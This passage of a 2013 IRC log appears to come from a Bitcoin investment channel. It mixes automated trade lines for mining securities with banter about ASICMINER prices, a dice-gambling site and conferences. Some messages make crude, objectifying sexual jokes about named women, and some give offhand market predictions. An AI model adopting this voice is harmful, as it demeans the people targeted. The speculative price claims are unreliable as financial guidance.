2.86 BTC [+] Jun 25 05:48:25 [HAVELOCK] [ASICM] 95 @ 0.03299 = 3.1341 BTC [-] Jun 25 05:48:51 [BTCTC] [BASIC-MINING] 1 @ 1.47 BTC [+] Jun 25 05:50:40 [BTCTC] [TAT.ASICMINER] 1 @ 0.034 BTC [+] Jun 25 05:50:42 [BTCTC] [TAT.ASICMINER] 43 @ 0.03406 = 1.4646 BTC [+] Jun 25 05:50:43 [BTCTC] [TAT.ASICMINER] 136 @ 0.03406 = 4.6322 BTC [+] Jun 25 05:51:57 [BTCTC] [BASIC-MINING] 3 @ 1.49 = 4.47 BTC [+] Jun 25 05:52:22 [BTCTC] [ASICMINER-PT] 1 @ 3.4 BTC [-] Jun 25 05:52:49 [BTCTC] [BASIC-MINING] 2 @ 1.49 = 2.98 BTC [+] Jun 25 05:52:58 [BTCTC] [BASIC-MINING] 1 @ 1.49 BTC [+] Jun 25 05:55:16 [HAVELOCK] [ASICM] 58 @ 0.03299 = 1.9134 BTC [-] Jun 25 05:56:11 [BTCTC] [ASICMINER-PT] 1 @ 3.3501 BTC [-] Jun 25 05:56:27 [BTCTC] [ASICMINER-PT] 1 @ 3.3501 BTC [-] Jun 25 05:56:43 [BTCTC] [BASIC-MINING] 1 @ 1.49 BTC [+] Jun 25 05:56:45 [BTCTC] [BASIC-MINING] 1 @ 1.5 BTC [+] Jun 25 05:56:46 [BTCTC] [BASIC-MINING] 1 @ 1.5 BTC [+] Jun 25 05:59:38 [BTCTC] [S.MPOE-PT] 1 @ 0.000777 BTC [-] Jun 25 06:01:08 [BTCTC] [TAT.ASICMINER] 20 @ 0.03398 = 0.6796 BTC [-] Jun 25 06:01:50 [BTCTC] [S.MPOE-PT] 1 @ 0.000777 BTC [-] Jun 25 06:02:50 [BTCTC] [ASICMINER-PT] 1 @ 3.35 BTC [-] Jun 25 06:02:52 [BTCTC] [ASICMINER-PT] 1 @ 3.35 BTC [-] Jun 25 06:02:53 [BTCTC] [ASICMINER-PT] 1 @ 3.35 BTC [-] Jun 25 06:02:55 [BTCTC] [TAT.ASICMINER] 5 @ 0.033977 = 0.1699 BTC [-] Jun 25 06:04:12 [BTCTC] [TAT.ASICMINER] 1 @ 0.0337 BTC [-] Jun 25 06:05:29 [BTCTC] [BASIC-MINING] 1 @ 1.64 BTC [+] Jun 25 06:07:02 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1998 BTC [+] Jun 25 06:07:03 [BTCTC] [TAT.ASICMINER] 36 @ 0.033612 = 1.21 BTC [-] Jun 25 06:07:07 [BTCTC] [TAT.ASICMINER] 6 @ 0.03361 = 0.2017 BTC [-] Jun 25 06:07:09 [BTCTC] [TAT.ASICMINER] 2 @ 0.0335 = 0.067 BTC [-] Jun 25 06:09:15 [BTCTC] [ASICMINER-PT] 1 @ 3.36 BTC [+] Jun 25 06:10:29 [BTCTC] [ASICMINER-PT] 2 @ 3.343001 = 6.686 BTC [-] Jun 25 06:10:31 [BTCTC] [ASICMINER-PT] 2 @ 3.343 = 6.686 BTC [-] Jun 25 06:10:33 [BTCTC] [ASICMINER-PT] 2 @ 3.342 = 6.684 BTC [-] Jun 25 06:11:56 [BTCTC] [ASICMINER-PT] 10 @ 3.36 = 33.6 BTC [+] Jun 25 06:12:04 [BTCTC] [TAT.ASICMINER] 12 @ 0.034095 = 0.4091 BTC [+] Jun 25 06:12:19 [BTCTC] [TAT.ASICMINER] 14 @ 0.034094 = 0.4773 BTC [-] **** BEGIN LOGGING AT Tue Jun 25 16:25:57 2013 Jun 25 16:26:55 [BTCTC] [S.MPOE-PT] 8 @ 0.00078 = 0.0062 BTC [+] Jun 25 16:28:09 ? Jun 25 16:28:36 they sold, felt guilty, and are buying back now xD Jun 25 16:28:52 ahh, seller's remorse Jun 25 16:29:04 yes, that lol Jun 25 16:29:07 hehe Jun 25 16:29:21 maybe you aren't the devil after all Jun 25 16:31:56 [BTCTC] [TAT.ASICMINER] 9 @ 0.03431 = 0.3088 BTC [+] Jun 25 16:33:16 [BTCTC] [BASIC-MINING] 1 @ 1.740021 BTC [-] Jun 25 16:33:37 there's always next diff Jun 25 16:33:44 [BTCTC] [ASICMINER-PT] 1 @ 3.456 BTC [-] Jun 25 16:35:09 seems like AM is throttling their own farm to me Jun 25 16:35:14 [BTCTC] [TAT.ASICMINER] 1 @ 0.03444 BTC [+] Jun 25 16:35:23 so they can sell USBs easier Jun 25 16:35:38 and sinc eno one else is contributing to nethash this diff period Jun 25 16:36:45 [BTCTC] [TAT.ASICMINER] 21 @ 0.034012 = 0.7143 BTC [-] Jun 25 16:37:18 ThickAsThieves http://trilema.com/2013/in-re-noobs-and-conventions/#comment-93689 Jun 25 16:37:22 you'll prolly appreicate that. Jun 25 16:38:27 [BTCTC] [TAT.ASICMINER] 1 @ 0.034013 BTC [+] Jun 25 16:38:37 mircea-popescu , your Trilema articles have been excellent lately. I really enjoyed the state and banking Jun 25 16:39:00 a ty! Jun 25 16:39:32 [BTCTC] [TAT.ASICMINER] 1 @ 0.034013 BTC [+] Jun 25 16:40:19 [BTCTC] [TAT.VIRTUALMINE] 93 @ 0.0052 = 0.4836 BTC [-] Jun 25 16:40:21 [BTCTC] [TAT.VIRTUALMINE] 30 @ 0.0052 = 0.156 BTC [-] Jun 25 16:41:27 Yep good stuff lately Jun 25 16:41:55 it's also pretty awesome to have the subjects of our conversations talk back Jun 25 16:42:16 wish it happened more Jun 25 16:42:53 would be nice to get proven wrong once in a while about all the people and services that get chastised in this room Jun 25 16:42:59 however unlikley that may be Jun 25 16:43:32 pretty much what you say really, "I am telling you what works and what does not work, with a view of helping you save whatever’s left of your life from stupid waste (ie, use towards something we know doesn’t work). Waste it cleverly, like everyone else (ie, use it towards something we don’t yet know doesn’t work)." Jun 25 16:43:53 the last line being the best Jun 25 16:48:29 [BTCTC] [TAT.ASICMINER] 2 @ 0.034429 = 0.0689 BTC [+] Jun 25 16:48:54 [BTCTC] [TAT.ASICMINER] 15 @ 0.034015 = 0.5102 BTC [-] Jun 25 16:51:33 [BTCTC] [TAT.ASICMINER] 15 @ 0.034432 = 0.5165 BTC [+] Jun 25 16:53:00 [BTCTC] [TAT.ASICMINER] 43 @ 0.034435 = 1.4807 BTC [+] Jun 25 16:56:06 [HAVELOCK] [HIM] 1 @ 0.200001 BTC [-] Jun 25 16:56:07 [HAVELOCK] [HIM] 1 @ 0.2 BTC [-] Jun 25 16:56:07 [HAVELOCK] [HIM] 3 @ 0.1912 = 0.5736 BTC [-] Jun 25 16:56:09 [HAVELOCK] [HIM] 2 @ 0.1911 = 0.3822 BTC [-] Jun 25 16:56:10 [HAVELOCK] [HIM] 1 @ 0.191 BTC [-] Jun 25 16:56:18 [BTCTC] [TAT.ASICMINER] 24 @ 0.03444 = 0.8266 BTC [+] Jun 25 16:57:29 [BTCTC] [S.MPOE-PT] 17 @ 0.000777 = 0.0132 BTC [-] Jun 25 16:58:16 [BTCTC] [S.DICE-PT] 7 @ 0.002249 = 0.0157 BTC [-] Jun 25 17:03:58 [BTCTC] [ASICMINER-PT] 1 @ 3.4558 BTC [-] Jun 25 17:04:01 [BTCTC] [ASICMINER-PT] 2 @ 3.456 = 6.912 BTC [+] Jun 25 17:04:03 [BTCTC] [ASICMINER-PT] 2 @ 3.457 = 6.914 BTC [+] Jun 25 17:04:05 [BTCTC] [ASICMINER-PT] 1 @ 3.458 BTC [+] Jun 25 17:05:45 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.0053 = 0.53 BTC [+] Jun 25 17:05:47 [BTCTC] [TAT.VIRTUALMINE] 500 @ 0.00535 = 2.675 BTC [+] Jun 25 17:05:47 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.00538 = 0.538 BTC [+] Jun 25 17:05:48 [BTCTC] [TAT.VIRTUALMINE] 164 @ 0.005685 = 0.9323 BTC [+] Jun 25 17:05:50 [BTCTC] [TAT.VIRTUALMINE] 28 @ 0.006 = 0.168 BTC [+] Jun 25 17:05:51 [BTCTC] [TAT.VIRTUALMINE] 15 @ 0.006 = 0.09 BTC [+] Jun 25 17:05:51 wtf Jun 25 17:05:52 [BTCTC] [TAT.VIRTUALMINE] 23 @ 0.006132 = 0.141 BTC [+] Jun 25 17:05:53 [BTCTC] [TAT.VIRTUALMINE] 15 @ 0.0063 = 0.0945 BTC [+] Jun 25 17:05:54 [BTCTC] [TAT.VIRTUALMINE] 35 @ 0.0063 = 0.2205 BTC [+] Jun 25 17:06:31 well yeah Jun 25 17:06:34 [BTCTC] [TAT.VIRTUALMINE] 150 @ 0.00625 = 0.9375 BTC [-] Jun 25 17:06:47 lol wasn't that sghit at 3 yest ? Jun 25 17:06:51 yep Jun 25 17:06:57 as low as .0025 Jun 25 17:07:13 clearly financial experts at work. Jun 25 17:08:18 maybe they know something we dont Jun 25 17:08:36 yeah, this is pretty likely. Jun 25 17:08:41 hehe Jun 25 17:08:50 we, for instance, don't know their fiancee michelle. Jun 25 17:09:15 she doesn't eat the cock, but she does that twirly thing in the coffee to die for. Jun 25 17:09:24 nor what Cathy does for work Jun 25 17:10:18 likely corporate espionage Jun 25 17:11:58 lol Jun 25 17:12:07 cathy is the unsausage fest person. Jun 25 17:12:11 sorta like the designated driver. Jun 25 17:12:14 [BTCTC] [ASICMINER-PT] 2 @ 3.459 = 6.918 BTC [+] Jun 25 17:12:48 ah, a diversionary tactic Jun 25 17:12:51 [BTCTC] [ASICMINER-PT] 1 @ 3.462 BTC [+] Jun 25 17:13:21 no one will notice whether anything usefull happened at the con, for distraction to Cathy's bustline Jun 25 17:13:23 [BTCTC] [ASICMINER-PT] 1 @ 3.462 BTC [+] Jun 25 17:14:03 [BTCTC] [ASICMINER-PT] 2 @ 3.46299 = 6.926 BTC [+] Jun 25 17:14:34 [BTCTC] [ASICMINER-PT] 5 @ 3.462 = 17.31 BTC [-] Jun 25 17:14:36 [BTCTC] [ASICMINER-PT] 4 @ 3.46299 = 13.852 BTC [+] Jun 25 17:14:40 bubble Jun 25 17:15:17 any bets on where AM price will fall after small divs are announced? Jun 25 17:15:45 it's gone up like a full coin in a week Jun 25 17:16:19 [BTCTC] [TAT.ASICMINER] 1 @ 0.03444 BTC [+] Jun 25 17:16:57 [BTCTC] [TAT.ASICMINER] 35 @ 0.03444 = 1.2054 BTC [+] Jun 25 17:17:55 by now am is hopeless. Jun 25 17:18:05 it will continue going up and then drop 90%+ in two days. Jun 25 17:18:18 [HAVELOCK] [ASICM] 150 @ 0.03385001 = 5.0775 BTC [-] Jun 25 17:18:30 [BTCTC] [TAT.ASICMINER] 37 @ 0.03444 = 1.2743 BTC [+] Jun 25 17:18:38 and i'll say friedcat fucked up finance and people will be hailing and wailing and miss the point. Jun 25 17:18:49 i really wish there was another stock with some momentum Jun 25 17:18:50 of course i said it long ago too, but with so many experts around... Jun 25 17:19:00 nah see, because stupid momentum concentrates Jun 25 17:19:11 given how much stupidity I can see in the forums, I'm pretty sure it will drop again Jun 25 17:19:11 you can't have two fool's plays at the same time. fools seldom differ. Jun 25 17:19:18 it actually is a safety move to create two Jun 25 17:19:35 I already have a buy order set up Jun 25 17:19:39 why the fuck aren't there any others Jun 25 17:19:57 no one is making anything Jun 25 17:20:01 [BTCTC] [PAJKA.BOND] 15 @ 0.048751 = 0.7313 BTC [-] Jun 25 17:20:03 [BTCTC] [PAJKA.BOND] 1 @ 0.04875 BTC [-] Jun 25 17:20:04 [BTCTC] [PAJKA.BOND] 10 @ 0.048742 = 0.4874 BTC [-] Jun 25 17:20:06 [BTCTC] [PAJKA.BOND] 1 @ 0.04862 BTC [-] Jun 25 17:20:07 [BTCTC] [PAJKA.BOND] 4 @ 0.0486 = 0.1944 BTC [-] Jun 25 17:20:24 [HAVELOCK] [ASICM] 40 @ 0.03385001 = 1.354 BTC [-] Jun 25 17:20:32 [HAVELOCK] [ASICM] 5 @ 0.03385001 = 0.1693 BTC [-] Jun 25 17:21:07 i know you are mp, but the market needs something more here-and-now-ish Jun 25 17:21:35 maybe i should promote just-dice to these AM peeps Jun 25 17:21:48 haha that's an idea. Jun 25 17:21:55 [BTCTC] [DMS.SELLING] 20 @ 0.032518 = 0.6504 BTC [-] Jun 25 17:21:57 [BTCTC] [DMS.SELLING] 3 @ 0.032517 = 0.0976 BTC [-] Jun 25 17:21:59 [BTCTC] [DMS.SELLING] 11 @ 0.03251 = 0.3576 BTC [-] Jun 25 17:22:14 certainly resolve a large part of the capital misallocation problem. Jun 25 17:22:42 [BTCTC] [BASIC-MINING] 1 @ 1.788966 BTC [+] Jun 25 17:23:52 too bad there's no way for me to make money promoting just-dice Jun 25 17:24:00 or peddling it for that matter Jun 25 17:24:15 (as an investment opportunity) Jun 25 17:24:23 why not ? Jun 25 17:24:29 drop whatever investment in andf then you get a % Jun 25 17:25:37 does the site have enough usage traffic to avoid dilution of the investor base being a big deal Jun 25 17:25:50 [BTCTC] [TAT.ASICMINER] 14 @ 0.03444 = 0.4822 BTC [+] Jun 25 17:25:52 [BTCTC] [TAT.ASICMINER] 6 @ 0.03444 = 0.2066 BTC [+] Jun 25 17:26:00 [BTCTC] [S.DICE-PT] 6 @ 0.002249 = 0.0135 BTC [-] Jun 25 17:26:04 wait what ? Jun 25 17:26:22 well the kitty seems to be growing faster than the profit Jun 25 17:26:27 last i checked at least Jun 25 17:26:29 so ? Jun 25 17:26:49 so it just a bunch of money sitting there if no one is playing Jun 25 17:26:54 no? Jun 25 17:27:06 a, but people are playing. actually the velocity is quite comparable, Jun 25 17:27:10 everyone likes to money just sitting Jun 25 17:27:14 hmm Jun 25 17:27:18 house was up 100 yest, is up 200 now. had ~5k invested now has about 8k Jun 25 17:27:31 interesting Jun 25 17:27:33 course it's up WAY more than the stat edge indicates. Jun 25 17:27:42 in that sense total wagered went from about 4k to about 6k Jun 25 17:28:11 but honestly i think it's stabilizing. cp risk is becoming significant in most everyone's eyes, Jun 25 17:28:17 or to quote bugpowder "it's not on mpex" Jun 25 17:28:41 but being on mpex is not possible here right? Jun 25 17:29:02 unless you buy it Jun 25 17:29:07 but no point in that Jun 25 17:29:19 i have no idea how it'd be possible, no. Jun 25 17:29:21 [BTCTC] [TAT.ASICMINER] 12 @ 0.034435 = 0.4132 BTC [-] Jun 25 17:29:48 [BTCTC] [BASIC-MINING] 1 @ 1.789999 BTC [+] Jun 25 17:30:38 [BTCTC] [DMS.PURCHASE] 8 @ 0.053963 = 0.4317 BTC [-] Jun 25 17:30:40 [BTCTC] [S.DICE-PT] 87 @ 0.002249 = 0.1957 BTC [-] Jun 25 17:31:31 [BTCTC] [TAT.ASICMINER] 17 @ 0.03444 = 0.5855 BTC [+] Jun 25 17:31:47 [BTCTC] [S.DICE-PT] 1 @ 0.00225 BTC [+] Jun 25 17:32:40 [BTCTC] [B.YABMC] 10 @ 0.0079 = 0.079 BTC [+] Jun 25 17:32:47 Attention ASICMINER Investors: The Latest Poll of Questions to Friedcat is ready for voting: https://docs.google.com/forms/d/1M7wigyDWjKjabHKdC7msaEfXvYaNxtMbbmTIRss8EqU/viewform Jun 25 17:33:54 "How to delect memory from computer" Jun 25 17:34:24 "Earlier this year, you committed to a minimum of 10% of the network hashing" is there twice Jun 25 17:35:23 i noticed Jun 25 17:35:28 thx Jun 25 17:42:34 hi all Jun 25 17:42:48 hi Jun 25 17:43:22 satoshi square went really well yesterday Jun 25 17:43:27 we did $10,000 in volume Jun 25 17:43:40 no arrests? Jun 25 17:43:42 :) Jun 25 17:43:43 nope Jun 25 17:43:44 lol Jun 25 17:43:57 Fred Wilson from Union Square Ventures showed up Jun 25 17:44:33 did he buy? Jun 25 17:46:21 [HAVELOCK] [HIM] 2 @ 0.229888 = 0.4598 BTC [+] Jun 25 17:46:43 nice job mjr_1 Jun 25 17:46:48 mtgox is almost obsolete now Jun 25 17:47:08 he did buy!!! Jun 25 17:47:14 it was a token amount, he wasn't carrying cash Jun 25 17:47:20 but he bought $10 worth Jun 25 17:47:24 and seemed to enjoy it Jun 25 17:47:37 and yes, mt gox is increasingly irrelevant Jun 25 17:48:06 sweet Jun 25 17:48:15 berlin is starting saturday Jun 25 17:48:18 if anyone is a berliner Jun 25 17:48:30 [BTCTC] [DMS.SELLING] 26 @ 0.03251 = 0.8453 BTC [-] Jun 25 17:49:10 hm Jun 25 17:49:18 i do it in slovenia just to kick bitstamp guys out Jun 25 17:49:40 [BTCTC] [BASIC-MINING] 1 @ 1.8 BTC [+] Jun 25 17:51:41 [BTCTC] [TAT.ASICMINER] 14 @ 0.03444 = 0.4822 BTC [+] Jun 25 17:52:36 [BTCTC] [DMS.SELLING] 11 @ 0.0339 = 0.3729 BTC [+] Jun 25 17:54:20 [BTCTC] [TAT.ASICMINER] 8 @ 0.03444 = 0.2755 BTC [+] Jun 25 17:54:23 [BTCTC] [TAT.ASICMINER] 31 @ 0.03444 = 1.0676 BTC [+] Jun 25 17:54:25 [BTCTC] [TAT.ASICMINER] 9 @ 0.03444 = 0.31 BTC [+] Jun 25 17:56:45 [BTCTC] [DMS.SELLING] 8 @ 0.033 = 0.264 BTC [-] Jun 25 17:57:27 [BTCTC] [ASICMINER-PT] 1 @ 3.4577 BTC [-] Jun 25 17:58:48 [BTCTC] [ASICMINER-PT] 2 @ 3.458 = 6.916 BTC [+] Jun 25 18:01:04 [BTCTC] [DMS.MINING] 33 @ 0.022001 = 0.726 BTC [+] Jun 25 18:01:25 [BTCTC] [DMS.MINING] 4 @ 0.022757 = 0.091 BTC [+] Jun 25 18:02:38 [BTCTC] [DMS.MINING] 100 @ 0.02277 = 2.277 BTC [+] Jun 25 18:03:24 [BTCTC] [DMS.MINING] 4 @ 0.022001 = 0.088 BTC [-] Jun 25 18:03:45 [BTCTC] [DMS.MINING] 4 @ 0.022 = 0.088 BTC [-] Jun 25 18:04:50 [BTCTC] [TAT.ASICMINER] 15 @ 0.03444 = 0.5166 BTC [+] Jun 25 18:04:52 [BTCTC] [TAT.ASICMINER] 35 @ 0.03444 = 1.2054 BTC [+] Jun 25 18:05:54 [BTCTC] [TAT.ASICMINER] 12 @ 0.03444 = 0.4133 BTC [+] Jun 25 18:07:25 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.006249 = 0.0625 BTC [-] Jun 25 18:11:04 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1998 BTC [+] Jun 25 18:11:16 [HAVELOCK] [ASICM] 10 @ 0.03333 = 0.3333 BTC [-] Jun 25 18:11:33 [BTCTC] [TAT.ASICMINER] 6 @ 0.034027 = 0.2042 BTC [-] Jun 25 18:13:32 [BTCTC] [TAT.ASICMINER] 6 @ 0.034438 = 0.2066 BTC [+] Jun 25 18:16:49 [BTCTC] [TAT.ASICMINER] 19 @ 0.034439 = 0.6543 BTC [+] Jun 25 18:17:59 [BTCTC] [DMS.PURCHASE] 8 @ 0.053963 = 0.4317 BTC [-] Jun 25 18:20:33 [BTCTC] [COGNITIVE] 1 @ 0.340011 BTC [-] Jun 25 18:27:04 [BTCTC] [DMS.SELLING] 1 @ 0.033 BTC [-] Jun 25 18:27:42 [BTCTC] [DMS.PURCHASE] 1 @ 0.053963 BTC [-] Jun 25 18:30:29 [BTCTC] [ASICMINER-PT] 1 @ 3.458 BTC [+] Jun 25 18:35:40 [BTCTC] [DMS.MINING] 1 @ 0.022 BTC [-] Jun 25 18:38:04 [BTCTC] [DMS.PURCHASE] 7 @ 0.053963 = 0.3777 BTC [-] Jun 25 18:39:30 [BTCTC] [TAT.ASICMINER] 1 @ 0.034044 BTC [-] Jun 25 18:40:03 [BTCTC] [DMS.SELLING] 20 @ 0.034294 = 0.6859 BTC [+] Jun 25 18:44:44 [BTCTC] [TAT.ASICMINER] 10 @ 0.034033 = 0.3403 BTC [-] Jun 25 18:45:54 [BTCTC] [ASICMINER-PT] 1 @ 3.45 BTC [-] Jun 25 18:47:30 [BTCTC] [ASICMINER-PT] 5 @ 3.45 = 17.25 BTC [-] Jun 25 18:47:32 [BTCTC] [ASICMINER-PT] 2 @ 3.458 = 6.916 BTC [+] Jun 25 18:47:33 [BTCTC] [ASICMINER-PT] 8 @ 3.458 = 27.664 BTC [+] Jun 25 18:47:34 [BTCTC] [ASICMINER-PT] 3 @ 3.459 = 10.377 BTC [+] Jun 25 18:47:36 [BTCTC] [ASICMINER-PT] 2 @ 3.46 = 6.92 BTC [+] Jun 25 18:47:37 [BTCTC] [ASICMINER-PT] 10 @ 3.461 = 34.61 BTC [+] Jun 25 18:47:38 [BTCTC] [ASICMINER-PT] 1 @ 3.462 BTC [+] Jun 25 18:47:40 [BTCTC] [ASICMINER-PT] 17 @ 3.46299 = 58.8708 BTC [+] Jun 25 18:47:42 [BTCTC] [ASICMINER-PT] 2 @ 3.46299 = 6.926 BTC [+] Jun 25 18:47:43 [BTCTC] [ASICMINER-PT] 2 @ 3.464 = 6.928 BTC [+] Jun 25 18:47:45 [BTCTC] [ASICMINER-PT] 1 @ 3.465 BTC [+] Jun 25 18:47:47 [BTCTC] [ASICMINER-PT] 2 @ 3.469 = 6.938 BTC [+] Jun 25 18:47:48 [BTCTC] [ASICMINER-PT] 1 @ 3.479 BTC [+] Jun 25 18:47:52 [BTCTC] [ASICMINER-PT] 1 @ 3.48 BTC [+] Jun 25 18:49:30 mjr_1: when i'm done Jun 25 18:49:30 $ Jun 25 18:49:45 mjr_1: when i have more time on my hands i'll launch the paris edition Jun 25 18:50:07 [BTCTC] [DMS.MINING] 12 @ 0.021001 = 0.252 BTC [-] Jun 25 18:50:09 [BTCTC] [DMS.MINING] 5 @ 0.021 = 0.105 BTC [-] Jun 25 18:50:55 [BTCTC] [DMS.SELLING] 20 @ 0.033001 = 0.66 BTC [-] Jun 25 18:51:18 [BTCTC] [TAT.VIRTUALMINE] 7 @ 0.005207 = 0.0364 BTC [-] Jun 25 18:51:35 [BTCTC] [DMS.PURCHASE] 18 @ 0.053963 = 0.9713 BTC [-] Jun 25 18:51:43 [BTCTC] [TAT.ASICMINER] 1 @ 0.034433 BTC [+] Jun 25 18:51:49 [BTCTC] [TAT.ASICMINER] 1 @ 0.034433 BTC [+] Jun 25 18:52:30 davout must do a juste-filles version Jun 25 18:52:32 i'd come Jun 25 18:52:32 [BTCTC] [DMS.SELLING] 125 @ 0.0343 = 4.2875 BTC [+] Jun 25 18:52:33 [BTCTC] [DMS.SELLING] 75 @ 0.0345 = 2.5875 BTC [+] Jun 25 18:53:02 https://sphotos-b.xx.fbcdn.net/hphotos-ash4/p480x480/1002090_550957621634554_1494877713_n.png Jun 25 18:53:06 if i may suggest a uniform ? Jun 25 18:53:53 so there's a conference in atlanta Jun 25 18:54:08 you guys were making fun of it yesterday but i didn't even know Jun 25 18:54:14 [BTCTC] [DMS.SELLING] 75 @ 0.0345 = 2.5875 BTC [+] Jun 25 18:54:25 [BTCTC] [TAT.ASICMINER] 7 @ 0.03443 = 0.241 BTC [-] Jun 25 18:54:32 mircea_popescu: sounds like a plan Jun 25 18:55:00 jcpham by now conferences are like whores Jun 25 18:55:09 you can safely make fun of any configuration in the knowledge there probably exists one Jun 25 18:55:32 i'm not big on suits anyways Jun 25 18:56:04 unless there are hot women around Jun 25 18:56:12 and i doubt there will be hot women Jun 25 18:56:56 or blow Jun 25 18:57:06 it's Atlanta, all women will be hot Jun 25 18:57:09 :) Jun 25 18:57:21 it's about an hour drive for me Jun 25 18:57:27 if i drive my normal speed Jun 25 18:57:43 i could go to six flags to Jun 25 18:57:46 like 6hrs for me i think Jun 25 18:57:52 ride a roller coaster or some shit Jun 25 18:57:57 i'd go if i had any real reason to Jun 25 18:58:12 i'm an introvert Jun 25 18:58:18 i really can't stand excited geeks. Jun 25 18:58:23 i would sit in the corner and watch Jun 25 18:58:32 i would be the odd one out Jun 25 18:58:35 s/watch/masturbate/ Jun 25 18:58:48 mmmmm public masterbation Jun 25 18:59:02 that seems so wrong Jun 25 18:59:12 i went to this marketing convention/seminar thing with a friend once, for his MSP company Jun 25 18:59:16 what a nightmare Jun 25 18:59:28 it was near halloween Jun 25 18:59:36 i've done a few conventions of varying industries Jun 25 18:59:39 so there was a costume party Jun 25 18:59:44 for whatever reason i was there Jun 25 18:59:48 never my scene Jun 25 18:59:55 i was just utterly embarassed most of the time Jun 25 19:00:01 [BTCTC] [TAT.ASICMINER] 1 @ 0.03444 BTC [+] Jun 25 19:00:04 conventions have the advantage of letting you work uninterrupted Jun 25 19:00:10 and I harassed the speakers about their shitty marketing advice Jun 25 19:00:16 hah davout Jun 25 19:00:30 [BTCTC] [DMS.MINING] 7 @ 0.02 = 0.14 BTC [-] Jun 25 19:00:43 it was largely a total pitch-fest Jun 25 19:01:00 jcpham: yep, wifi, a seat, and a good excuse to tell anyone talking to you that it's not the right moment Jun 25 19:01:27 "You may pitch if asked to pitch, you may talk business by mutual agreement, but you may not under any circumstances cold hit on peopleiv - they come to the conference to relax and enjoy themselves, not to be intellectually brutalized. Please respect that." Jun 25 19:01:33 then people ask me o, what, someone complained ? Jun 25 19:01:34 mircea_popescu: give me some trilema credits, i'll send you a postcard from paris Jun 25 19:01:39 no dude. i just am a strategic player Jun 25 19:01:42 i might go, but good luck socializing with me Jun 25 19:01:44 which means i think ahead omg. Jun 25 19:01:47 i'm not an excited geek Jun 25 19:01:50 not at all Jun 25 19:01:50 [BTCTC] [DMS.MINING] 8 @ 0.02 = 0.16 BTC [-] Jun 25 19:02:00 davout write MP on your boobies! Jun 25 19:02:11 it's so close and i can stalk bitcoiners in real life Jun 25 19:02:22 mircea_popescu: that was funny the first time Jun 25 19:02:25 :-) Jun 25 19:02:31 the first time was when i was 5. Jun 25 19:02:42 mircea_popescu: do it the rails way, don't repeat yourself x) Jun 25 19:02:50 lol Jun 25 19:03:08 (i(m(all(into)this)(weird)(shit))))))) Jun 25 19:03:24 reverse polish sodomy? Jun 25 19:03:28 lol Jun 25 19:03:57 any sufficiently delabree orgy is going to contain a half backed, sodomistic, slow and unpleasant reimplementation of basic lisp Jun 25 19:04:43 [HAVELOCK] [ASICM] 10 @ 0.0338 = 0.338 BTC [+] Jun 25 19:04:51 lol Jun 25 19:06:06 http://trilema.com/2013/i-am-not-a-nihilist/ Jun 25 19:06:12 I am not a nihilist. pe Trilema - Un blog de Mircea Popescu. Jun 25 19:06:13 now let's have a guessing competition Jun 25 19:06:18 as to which chan person is the anon. Jun 25 19:06:36 [BTCTC] [DMS.MINING] 20 @ 0.019 = 0.38 BTC [-] Jun 25 19:06:38 [BTCTC] [DMS.MINING] 20 @ 0.019 = 0.38 BTC [-] Jun 25 19:06:46 also someone must make derp.mining Jun 25 19:06:52 possibly paired up with herp.mining Jun 25 19:07:32 the next mpex IPO? Jun 25 19:07:34 ;) Jun 25 19:08:07 [MPEX] [S.MPOE] 5250 @ 0.00078535 = 4.1231 BTC [+] Jun 25 19:08:17 [MPEX] [S.MPOE] 12024 @ 0.00078751 = 9.469 BTC [+] Jun 25 19:08:36 [HAVELOCK] [ASICM] 55 @ 0.03385001 = 1.8618 BTC [+] Jun 25 19:08:39 lol Jun 25 19:09:08 [BTCTC] [ASICMINER-PT] 1 @ 2.7 BTC [-] Jun 25 19:09:11 [HAVELOCK] [HIM] 1 @ 0.199 BTC [-] Jun 25 19:10:13 [BTCTC] [TAT.ASICMINER] 1 @ 0.03429 BTC [-] Jun 25 19:10:28 [HAVELOCK] [ASICM] 49 @ 0.034 = 1.666 BTC [+] Jun 25 19:11:32 [BTCTC] [TAT.ASICMINER] 1 @ 0.03429 BTC [-] Jun 25 19:12:16 [HAVELOCK] [HIM] 3 @ 0.229 = 0.687 BTC [+] Jun 25 19:14:56 [BTCTC] [TAT.VIRTUALMINE] 23 @ 0.005211 = 0.1199 BTC [+] Jun 25 19:15:16 [BTCTC] [DMS.SELLING] 20 @ 0.034996 = 0.6999 BTC [+] Jun 25 19:15:18 [BTCTC] [DMS.SELLING] 1 @ 0.034996 BTC [+] Jun 25 19:15:20 [BTCTC] [TAT.ASICMINER] 30 @ 0.0343 = 1.029 BTC [+] Jun 25 19:15:21 [BTCTC] [TAT.VIRTUALMINE] 50 @ 0.00521 = 0.2605 BTC [-] Jun 25 19:16:30 [BTCTC] [BASIC-MINING] 1 @ 1.670124 BTC [-] Jun 25 19:16:38 [BTCTC] [DMS.SELLING] 10 @ 0.034999 = 0.35 BTC [+] Jun 25 19:16:40 [BTCTC] [TAT.ASICMINER] 83 @ 0.03429 = 2.8461 BTC [-] Jun 25 19:16:42 [BTCTC] [TAT.ASICMINER] 50 @ 0.0342 = 1.71 BTC [-] Jun 25 19:17:05 [BTCTC] [DMS.SELLING] 52 @ 0.034999 = 1.8199 BTC [+] Jun 25 19:18:51 [BTCTC] [DMS.SELLING] 10 @ 0.035 = 0.35 BTC [+] Jun 25 19:20:47 [BTCTC] [DMS.SELLING] 111 @ 0.035 = 3.885 BTC [+] Jun 25 19:20:49 [BTCTC] [DMS.SELLING] 100 @ 0.0355 = 3.55 BTC [+] Jun 25 19:22:05 For your consideration: http://coin.furuknap.net/what-is-the-halving-effect-in-bitcoin-mining-investments/ Jun 25 19:22:09 [BTCTC] [TAT.VIRTUALMINE] 30 @ 0.005204 = 0.1561 BTC [-] Jun 25 19:22:10 [BTCTC] [TAT.VIRTUALMINE] 50 @ 0.005207 = 0.2604 BTC [+] Jun 25 19:22:11 [BTCTC] [TAT.VIRTUALMINE] 50 @ 0.00521 = 0.2605 BTC [+] Jun 25 19:22:50 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1998 BTC [+] Jun 25 19:23:48 [HAVELOCK] [ASICM] 1 @ 0.034 BTC [+] Jun 25 19:25:38 is it a really verbose article with no real answer? Jun 25 19:26:51 yeah. Jun 25 19:27:06 actually IF just-dice eats s.dice's lunch there will be very bad news for friedcat and co. Jun 25 19:27:13 as competition for blocks essentially goes 